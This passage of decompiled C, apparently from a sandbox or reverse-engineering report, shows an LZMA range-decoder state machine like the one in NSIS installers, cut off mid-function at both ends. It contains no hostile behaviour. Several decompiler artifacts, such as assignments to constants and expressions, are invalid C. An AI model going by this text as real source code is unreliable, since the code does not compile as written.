                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      							 *(_t613 - 0x40) = 1;
                                                                                      							_t533 = _t532 - (_t532 >> 5);
                                                                                      							 *_t606 = _t533;
                                                                                      						} else {
                                                                                      							 *(_t613 - 0x10) = _t565;
                                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                      						}
                                                                                      						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      							L139:
                                                                                      							_t534 =  *(_t613 - 0x84);
                                                                                      							L140:
                                                                                      							 *(_t613 - 0x88) = _t534;
                                                                                      							goto L1;
                                                                                      						} else {
                                                                                      							L137:
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								 *(_t613 - 0x88) = 5;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      							goto L139;
                                                                                      						}
                                                                                      					} else {
                                                                                      						if( *(__ebp - 0x60) == 0) {
                                                                                      							L171:
                                                                                      							_t536 = _t535 | 0xffffffff;
                                                                                      							L172:
                                                                                      							return _t536;
                                                                                      						}
                                                                                      						__eax = 0;
                                                                                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      						0 | _t258 = _t258 + _t258 + 9;
                                                                                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                      						L75:
                                                                                      						if( *(__ebp - 0x64) == 0) {
                                                                                      							 *(__ebp - 0x88) = 0x1b;
                                                                                      							L170:
                                                                                      							_t568 = 0x22;
                                                                                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                      							_t536 = 0;
                                                                                      							goto L172;
                                                                                      						}
                                                                                      						__eax =  *(__ebp - 0x14);
                                                                                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      						if(__eax >=  *(__ebp - 0x74)) {
                                                                                      							__eax = __eax +  *(__ebp - 0x74);
                                                                                      						}
                                                                                      						__edx =  *(__ebp - 8);
                                                                                      						__cl =  *(__eax + __edx);
                                                                                      						__eax =  *(__ebp - 0x14);
                                                                                      						 *(__ebp - 0x5c) = __cl;
                                                                                      						 *(__eax + __edx) = __cl;
                                                                                      						__eax = __eax + 1;
                                                                                      						__edx = 0;
                                                                                      						_t274 = __eax %  *(__ebp - 0x74);
                                                                                      						__eax = __eax /  *(__ebp - 0x74);
                                                                                      						__edx = _t274;
                                                                                      						__eax =  *(__ebp - 0x68);
                                                                                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      						_t283 = __ebp - 0x64;
                                                                                      						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                      						 *( *(__ebp - 0x68)) = __cl;
                                                                                      						L79:
                                                                                      						 *(__ebp - 0x14) = __edx;
                                                                                      						L80:
                                                                                      						 *(__ebp - 0x88) = 2;
                                                                                      					}
                                                                                      					L1:
                                                                                      					_t535 =  *(_t613 - 0x88);
                                                                                      					if(_t535 > 0x1c) {
                                                                                      						goto L171;
                                                                                      					}
                                                                                      					switch( *((intOrPtr*)(_t535 * 4 +  &M004074FE))) {
                                                                                      						case 0:
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      							_t535 =  *( *(_t613 - 0x70));
                                                                                      							if(_t535 > 0xe1) {
                                                                                      								goto L171;
                                                                                      							}
                                                                                      							_t539 = _t535 & 0x000000ff;
                                                                                      							_push(0x2d);
                                                                                      							asm("cdq");
                                                                                      							_pop(_t570);
                                                                                      							_push(9);
                                                                                      							_pop(_t571);
                                                                                      							_t609 = _t539 / _t570;
                                                                                      							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                      							asm("cdq");
                                                                                      							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                      							 *(_t613 - 0x3c) = _t604;
                                                                                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                      								L10:
                                                                                      								if(_t612 == 0) {
                                                                                      									L12:
                                                                                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      									goto L15;
                                                                                      								} else {
                                                                                      									goto L11;
                                                                                      								}
                                                                                      								do {
                                                                                      									L11:
                                                                                      									_t612 = _t612 - 1;
                                                                                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                      								} while (_t612 != 0);
                                                                                      								goto L12;
                                                                                      							}
                                                                                      							if( *(_t613 - 4) != 0) {
                                                                                      								GlobalFree( *(_t613 - 4));
                                                                                      							}
                                                                                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      							 *(_t613 - 4) = _t535;
                                                                                      							if(_t535 == 0) {
                                                                                      								goto L171;
                                                                                      							} else {
                                                                                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                      								goto L10;
                                                                                      							}
                                                                                      						case 1:
                                                                                      							L13:
                                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								 *(_t613 - 0x88) = 1;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      							_t45 = _t613 - 0x48;
                                                                                      							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                      							__eflags =  *_t45;
                                                                                      							L15:
                                                                                      							if( *(_t613 - 0x48) < 4) {
                                                                                      								goto L13;
                                                                                      							}
                                                                                      							_t547 =  *(_t613 - 0x40);
                                                                                      							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                      								L20:
                                                                                      								 *(_t613 - 0x48) = 5;
                                                                                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							 *(_t613 - 0x74) = _t547;
                                                                                      							if( *(_t613 - 8) != 0) {
                                                                                      								GlobalFree( *(_t613 - 8));
                                                                                      							}
                                                                                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                      							 *(_t613 - 8) = _t535;
                                                                                      							if(_t535 == 0) {
                                                                                      								goto L171;
                                                                                      							} else {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						case 2:
                                                                                      							L24:
                                                                                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                      							 *(_t613 - 0x84) = 6;
                                                                                      							 *(_t613 - 0x4c) = _t554;
                                                                                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                      							goto L132;
                                                                                      						case 3:
                                                                                      							L21:
                                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								 *(_t613 - 0x88) = 3;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							_t67 = _t613 - 0x70;
                                                                                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                      							__eflags =  *_t67;
                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      							L23:
                                                                                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                      							if( *(_t613 - 0x48) != 0) {
                                                                                      								goto L21;
                                                                                      							}
                                                                                      							goto L24;
                                                                                      						case 4:
                                                                                      							goto L133;
                                                                                      						case 5:
                                                                                      							goto L137;
                                                                                      						case 6:
                                                                                      							__edx = 0;
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x34) = 1;
                                                                                      								 *(__ebp - 0x84) = 7;
                                                                                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      							__esi =  *(__ebp - 0x60);
                                                                                      							__cl = 8;
                                                                                      							__cl = 8 -  *(__ebp - 0x3c);
                                                                                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      							__ecx =  *(__ebp - 0x3c);
                                                                                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      							__ecx =  *(__ebp - 4);
                                                                                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      							__eflags =  *(__ebp - 0x38) - 4;
                                                                                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      							if( *(__ebp - 0x38) >= 4) {
                                                                                      								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      								if( *(__ebp - 0x38) >= 0xa) {
                                                                                      									_t98 = __ebp - 0x38;
                                                                                      									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      									__eflags =  *_t98;
                                                                                      								} else {
                                                                                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      								}
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x38) = 0;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      							if( *(__ebp - 0x34) == __edx) {
                                                                                      								__ebx = 0;
                                                                                      								__ebx = 1;
                                                                                      								goto L61;
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                      									__eflags = __eax;
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 8);
                                                                                      								__ebx = 0;
                                                                                      								__ebx = 1;
                                                                                      								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      								goto L41;
                                                                                      							}
                                                                                      						case 7:
                                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      								__eax =  *(__ebp - 0x28);
                                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      								__eax = 0;
                                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      								__al = __al & 0x000000fd;
                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                                      								__eflags = __eax;
                                                                                      								 *(__ebp - 0x58) = __eax;
                                                                                      								goto L69;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 4);
                                                                                      							__ecx =  *(__ebp - 0x38);
                                                                                      							 *(__ebp - 0x84) = 8;
                                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      							goto L132;
                                                                                      						case 8:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                      								__ecx =  *(__ebp - 4);
                                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      								 *(__ebp - 0x84) = 9;
                                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      							}
                                                                                      							goto L132;
                                                                                      						case 9:
                                                                                      							goto L0;
                                                                                      						case 0xa:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x28);
                                                                                      							goto L88;
                                                                                      						case 0xb:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__ecx =  *(__ebp - 0x24);
                                                                                      								__eax =  *(__ebp - 0x20);
                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x28);
                                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      							L88:
                                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      							goto L89;
                                                                                      						case 0xc:
                                                                                      							L99:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t334 = __ebp - 0x70;
                                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t334;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							__eax =  *(__ebp - 0x2c);
                                                                                      							goto L101;
                                                                                      						case 0xd:
                                                                                      							L37:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xd;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t122 = __ebp - 0x70;
                                                                                      							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t122;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							L39:
                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							__eflags = __ebx - 0x100;
                                                                                      							if(__ebx >= 0x100) {
                                                                                      								goto L54;
                                                                                      							}
                                                                                      							L41:
                                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      							 *(__ebp - 0x48) = __eax;
                                                                                      							__eax = __eax + 1;
                                                                                      							__eax = __eax << 8;
                                                                                      							__eax = __eax + __ebx;
                                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								 *(__ebp - 0x40) = 1;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eflags = __eax;
                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edx;
                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								goto L39;
                                                                                      							} else {
                                                                                      								goto L37;
                                                                                      							}
                                                                                      						case 0xe:
                                                                                      							L46:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xe;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t156 = __ebp - 0x70;
                                                                                      							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t156;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							while(1) {
                                                                                      								L48:
                                                                                      								__eflags = __ebx - 0x100;
                                                                                      								if(__ebx >= 0x100) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                      								__edx = __ebx + __ebx;
                                                                                      								__ecx =  *(__ebp - 0x10);
                                                                                      								__esi = __edx + __eax;
                                                                                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      								__ax =  *__esi;
                                                                                      								 *(__ebp - 0x54) = __esi;
                                                                                      								__edi = __ax & 0x0000ffff;
                                                                                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      								if( *(__ebp - 0xc) >= __ecx) {
                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      									__cx = __ax;
                                                                                      									_t170 = __edx + 1; // 0x1
                                                                                      									__ebx = _t170;
                                                                                      									__cx = __ax >> 5;
                                                                                      									__eflags = __eax;
                                                                                      									 *__esi = __ax;
                                                                                      								} else {
                                                                                      									 *(__ebp - 0x10) = __ecx;
                                                                                      									0x800 = 0x800 - __edi;
                                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      									__ebx = __ebx + __ebx;
                                                                                      									 *__esi = __cx;
                                                                                      								}
                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L46;
                                                                                      								}
                                                                                      							}
                                                                                      							L54:
                                                                                      							_t173 = __ebp - 0x34;
                                                                                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      							__eflags =  *_t173;
                                                                                      							goto L55;
                                                                                      						case 0xf:
                                                                                      							L58:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xf;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t203 = __ebp - 0x70;
                                                                                      							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t203;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							L60:
                                                                                      							__eflags = __ebx - 0x100;
                                                                                      							if(__ebx >= 0x100) {
                                                                                      								L55:
                                                                                      								__al =  *(__ebp - 0x44);
                                                                                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      								goto L56;
                                                                                      							}
                                                                                      							L61:
                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                      							__edx = __ebx + __ebx;
                                                                                      							__ecx =  *(__ebp - 0x10);
                                                                                      							__esi = __edx + __eax;
                                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								_t217 = __edx + 1; // 0x1
                                                                                      								__ebx = _t217;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eflags = __eax;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								goto L60;
                                                                                      							} else {
                                                                                      								goto L58;
                                                                                      							}
                                                                                      						case 0x10:
                                                                                      							L109:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t365 = __ebp - 0x70;
                                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t365;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							goto L111;
                                                                                      						case 0x11:
                                                                                      							goto L69;
                                                                                      						case 0x12:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                      							__eflags = __eax;
                                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      							goto L130;
                                                                                      						case 0x13:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								_t469 = __ebp - 0x58;
                                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      								__eflags =  *_t469;
                                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                                      								 *(__ebp - 0x40) = 8;
                                                                                      								L144:
                                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                                      								goto L145;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                      							 *(__ebp - 0x30) = 8;
                                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      							L130:
                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                      							 *(__ebp - 0x40) = 3;
                                                                                      							goto L144;
                                                                                      						case 0x14:
                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      							__eax =  *(__ebp - 0x80);
